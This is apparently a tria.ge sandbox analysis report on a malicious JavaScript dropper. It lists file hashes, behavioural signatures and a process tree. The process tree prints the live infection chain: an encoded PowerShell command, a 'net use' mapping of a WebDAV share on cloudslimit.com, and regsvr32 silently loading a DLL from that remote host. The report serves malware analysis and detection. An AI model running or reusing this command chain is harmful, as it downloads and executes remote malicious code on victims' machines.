Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
  max time kernel:  121s
  max time network: 125s
  platform:         windows7_x64
  resource:         win7-20240705-en
  resource tags:    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  submitted:        25/07/2024, 15:57
Static task: static1
Behavioral task: behavioral1
  Sample:   213911248442766951.js
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample:   213911248442766951.js
  Resource: win10v2004-20240709-en
General
  Target: 213911248442766951.js
  Size:   19KB
  MD5:    5c2d257e51e5f6cb4ea13e803c140c6b
  SHA1:   081f1ae150c216471841da74da846eb1480ae271
  SHA256: 6e5c3fb55548ba47c94bda0ead0d360f889ddef72fa339309640cfc34f31a52b
  SHA512: afe3a87c7e334fe2abb217ee9cf8cb02ccf36fdeeea223da51301d75883bf8b0a703ecfeece1f3ac8334ed135581efc98d033f17a8cfc126d09f05ed2b9ae25b
  SSDEEP: 384:lDuN6ZVSsdzKGvbPUf5tssFtcD2Yj6gzjNfAvM1PsUK3Z0jZe06iTmVFfKN6YjsW:puYZVSsdzKGvbsf5Pm
Malware Config
Signatures
  Obfuscated Files or Information: Command Obfuscation (1 TTPs)
    Adversaries may obfuscate content during command execution to impede detection.
  Command and Scripting Interpreter: JavaScript (1 TTPs)
  Runs net.exe
  Suspicious behavior: EnumeratesProcesses (1 IoCs)
    pid   Process
    2796  powershell.exe
  Suspicious use of AdjustPrivilegeToken (1 IoCs)
    description              pid   Process
    Token: SeDebugPrivilege  2796  powershell.exe
  Suspicious use of WriteProcessMemory (11 IoCs)
    description                       pid   Process         procid_target
    PID 2296 wrote to memory of 2796  2296  wscript.exe     30
    PID 2296 wrote to memory of 2796  2296  wscript.exe     30
    PID 2296 wrote to memory of 2796  2296  wscript.exe     30
    PID 2796 wrote to memory of 2868  2796  powershell.exe  32
    PID 2796 wrote to memory of 2868  2796  powershell.exe  32
    PID 2796 wrote to memory of 2868  2796  powershell.exe  32
    PID 2796 wrote to memory of 2916  2796  powershell.exe  33
    PID 2796 wrote to memory of 2916  2796  powershell.exe  33
    PID 2796 wrote to memory of 2916  2796  powershell.exe  33
    PID 2796 wrote to memory of 2916  2796  powershell.exe  33
    PID 2796 wrote to memory of 2916  2796  powershell.exe  33
Processes
  C:\Windows\system32\wscript.exe (PID:2296)
    Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\213911248442766951.js
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID:2796)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA5ADEANwA2ADEAMgAwADcANQAxADEAMAA1ADEALgBkAGwAbAA=
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net.exe (PID:2868)
        Command line: "C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\
      C:\Windows\system32\regsvr32.exe (PID:2916)
        Command line: "C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\91761207511051.dll